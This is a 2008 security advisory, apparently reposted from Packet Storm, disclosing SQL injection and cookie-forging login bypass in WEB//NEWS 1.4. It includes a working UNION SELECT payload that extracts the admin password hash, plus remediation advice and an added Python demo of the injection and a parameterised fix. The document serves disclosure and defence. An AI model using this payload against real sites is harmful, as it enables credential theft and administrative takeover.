
webnews-sql.txt

17 Oct 2008, reported by David "Aesthetico" Vieira-Kurz. Source: packetstorm (packetstormsecurity.com)

WEB//NEWS SQL Injection and Cookie Manipulation advisory for version 1.4 and prior, allowing login bypass and full administrative access

Code
`[HACKATTACK Advisory 20081016] WEB//NEWS SQL Injection and Cookie Manipulation  
  
Details  
=======  
Product: WEB//NEWS  
Security-Risk: high  
Remote-Exploit: yes  
Vendor-URL: http://www.stylemotion.de/  
Vendor-Status: informed  
Advisory-Status: published  
  
Credits  
============  
Discovered by: David Vieira-Kurz  
http://www.HACKATTACK.at / www.HACKATTACK.eu  
  
Affected Products:  
----------------------------  
WEB//NEWS 1.4 and prior  
  
Original Advisory:  
============  
http://www.HACKATTACK.at/  
  
Introduction  
============  
WEB//NEWS is an easy-to-handle news management system written in PHP on top of MySQL.  
  
More Details  
============  
  
1. SQL Injection:  
---------------------  
Input passed to the "catid" parameter of "search.php" via $_POST is not properly sanitised before being used in a SQL query.  
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, for example a UNION SELECT that reads the administrator's password hash from the wn_user table.  
  
2. Cookie Manipulation:  
---------------------  
Once a successful SQL injection has returned the administrator's password hash, an attacker can use it to bypass the  
login by manipulating the login cookie and gain full administrative access to the news management system.  
  
1.1 PoC:  
============  
http://localhost/webnews/search.php?  
  
Postdata (the search form is submitted via POST):  
1. The attacker has to enter a keyword into the keyword text field. A non-empty keyword is required for successful exploitation.  
  
2. The attacker then posts the following SQL statement in the category id ("catid") field:  
  
') union select 1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from wn_user where userid=1/**  
  
The leading ') closes the parenthesised condition the value is placed in, the 19 numbered columns match the column count of the original SELECT (a UNION requires equal counts on both sides), the hash is placed in a column that search.php displays in its results, and the trailing /** comments out the remainder of the original query.  
  
  
Solution  
=============  
  
Fix  
===  
Upgrade to the newest version (1.4.1a).  
  
Solution  
=============  
Edit the source code to ensure that input is properly sanitised for the context in which it is used.  
"catid" is a numeric identifier, so cast it with intval() (or reject anything that is not a number) before it reaches the query.  
String input that is placed in a SQL statement must be escaped with mysql_real_escape_string(); the cleanest fix is to pass user input as bound parameters of a prepared statement instead of concatenating it into the query string.  
htmlspecialchars() and htmlentities() only protect the HTML output (they stop injected tags from being rendered); they do not prevent SQL injection, so they complement, but do not replace, the measures above.  
Further it is recommended to turn off the "register_globals" option in the "php.ini" on your webserver. magic_quotes and addslashes() add a blanket escaping layer, but they are not a reliable substitute for context-specific sanitisation.  
The login bypass in 2. shows that knowing the stored password hash is enough to forge the login cookie, so the hash has to be treated as a credential: the cookie should carry a server-generated session identifier rather than data derived from the hash.  
  
Example:  
<?php  
// numeric id: cast it (HTML-encoding does nothing for the SQL context)  
$catid = intval($_POST['catid']);  
// free-text keyword: escape for the SQL statement, encode separately for HTML output  
$keyword = mysql_real_escape_string($_POST['keyword']);  
$keyword_html = htmlspecialchars($_POST['keyword']);  
$id = intval($_POST['id']);  
?>  
  
History/Timeline  
================  
22.09.2008 discovery of the vulnerabilities  
22.09.2008 additional tests with other versions  
24.09.2008 contacted the vendor  
15.10.2008 advisory is written  
16.10.2008 advisory released  
  
HACKATTACK  
================  
HACKATTACK IT SECURITY GmbH is an Austrian penetration testing and security assessment company which focuses  
on web application security and firewall security.  
You can find more Information about HACKATTACK at  
http://www.HACKATTACK.at  
`
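The UNION payload from section 1.1 and the sanitisation advice from the Solution section, reproduced as an added Python example that is not part of the HACKATTACK advisory or of WEB//NEWS itself. It runs the injection against an in-memory SQLite database so the finding and the fix can be checked offline. The query shape, the table layouts, the sample rows and the sample hash are constructed assumptions: the real search.php selects 19 columns (which is why the advisory's payload carries 19 UNION columns) from tables whose layout the advisory does not give, so the model uses a 4-column news table and narrows the payload to match. Only wn_user, userid and password are taken from the PoC, and the keyword check reflects PoC step 1 on the assumption that the handler only queries when a keyword was supplied.

```python
"""Added example, not part of the HACKATTACK advisory or of WEB//NEWS itself.

Models the search.php injection against an in-memory SQLite database. The
query text, schema and rows are constructed assumptions; the real search.php
selects 19 columns, this model selects 4 and narrows the payload accordingly.
"""
import sqlite3

# Constructed sample hash (MD5 of "password"); the advisory gives none.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# The advisory's payload, narrowed from 19 to 4 columns for this schema.
PAYLOAD = "') union select 1,2,3,password from wn_user where userid=1/**"
# Same payload with the wrong column count: the UNION is rejected.
PAYLOAD_WRONG_WIDTH = "') union select 1,password from wn_user where userid=1/**"


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a small news table and the wn_user table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE wn_news (id INTEGER, catid INTEGER, title TEXT, text TEXT);
        CREATE TABLE wn_user (userid INTEGER, username TEXT, password TEXT);
        INSERT INTO wn_news VALUES (1, 1, 'Release', 'version 1.4 is out');
        INSERT INTO wn_user VALUES (1, 'admin', '%s');
        """ % ADMIN_HASH
    )
    return db


def search_vulnerable(db, keyword, catid):
    """Vulnerable shape (assumed): catid is concatenated into the SQL string.
    A ') in catid closes the parenthesised condition, the UNION appends rows
    from wn_user, and the trailing /** comments out the rest of the query."""
    if not keyword:
        return []  # PoC step 1: without a keyword no query is run
    sql = (
        "SELECT id, catid, title, text FROM wn_news "
        "WHERE (catid='%s') AND text LIKE '%%%s%%'" % (catid, keyword)
    )
    return db.execute(sql).fetchall()


def search_fixed(db, keyword, catid):
    """Hardened shape: catid must be an integer and both values travel as
    bound parameters, so the payload can never become SQL."""
    if not keyword:
        return []
    if not str(catid).isdigit():
        return []  # stricter than PHP's intval(), which silently yields 0
    sql = "SELECT id, catid, title, text FROM wn_news WHERE catid=? AND text LIKE ?"
    return db.execute(sql, (int(catid), "%" + keyword + "%")).fetchall()


def run_payload(search, payload):
    """Run a payload through the given search function on a fresh database;
    return the rows, or the database error text if the injected UNION fails."""
    try:
        return search(build_db(), "version", payload)
    except sqlite3.OperationalError as err:
        return str(err)


if __name__ == "__main__":
    print("legit :", search_vulnerable(build_db(), "version", "1"))
    print("vuln  :", run_payload(search_vulnerable, PAYLOAD))
    print("width :", run_payload(search_vulnerable, PAYLOAD_WRONG_WIDTH))
    print("fixed :", run_payload(search_fixed, PAYLOAD))
```

The wrong-width case is the reason the advisory's payload has exactly 19 numbered columns: the database refuses a UNION whose two sides differ in column count, so the attacker must pad to the width of the original SELECT. The hardened variant relies on the numeric check and on parameter binding; HTML encoding of the same values would change nothing about the query.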
